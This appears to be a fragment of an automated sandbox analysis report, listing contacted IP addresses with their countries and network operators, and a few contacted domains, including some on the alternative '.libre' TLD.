217.111.177.138
 unknown Germany
8220 COLTCOLTTechnologyServicesGroupLimitedGB false
83.128.177.218
 unknown Netherlands
15435 KABELFOONDELTAFiberNederlandNL false
180.42.92.109
 unknown Japan 4713 OCNNTTCommunicationsCorporationJP false
176.159.6.237
 unknown France
5410 BOUYGTEL-ISPFR false
211.241.138.113
 unknown Korea Republic of
38661 HCLC-AS-KRpurplestonesKR false
210.70.221.28
 unknown Taiwan; Republic of China (ROC)
1659 ERX-TANET-ASN1TaiwanAcademicNetworkTANetInformationC false
81.14.234.237
 unknown Germany
13045 HTP-ASDE false
209.39.65.191
 unknown United States
2914 NTT-COMMUNICATIONS-2914US false
154.74.231.60
 unknown Tanzania United Republic of
37035 MIC-ASTZ false
219.244.255.130
 unknown China
4538 ERX-CERNET-BKBChinaEducationandResearchNetworkCenter false
121.19.123.34
 unknown China
4837 CHINA169-BACKBONECHINAUNICOMChina169BackboneCN false
178.7.201.186
 unknown Germany
3209 VODANETInternationalIP-BackboneofVodafoneDE false
27.166.83.181
 unknown Korea Republic of
9644 SKTELECOM-NET-ASSKTelecomKR false
217.248.83.201
 unknown Germany
3320 DTAGInternetserviceprovideroperationsDE false

Contacted Domains

Name IP Active
nineteen.libre 103.253.147.242 true
daisy.ubuntu.com 162.213.35.25 true
fortyfivehundred.dyn. [malformed] unknown unknown
75cents.libre. [malformed] unknown unknown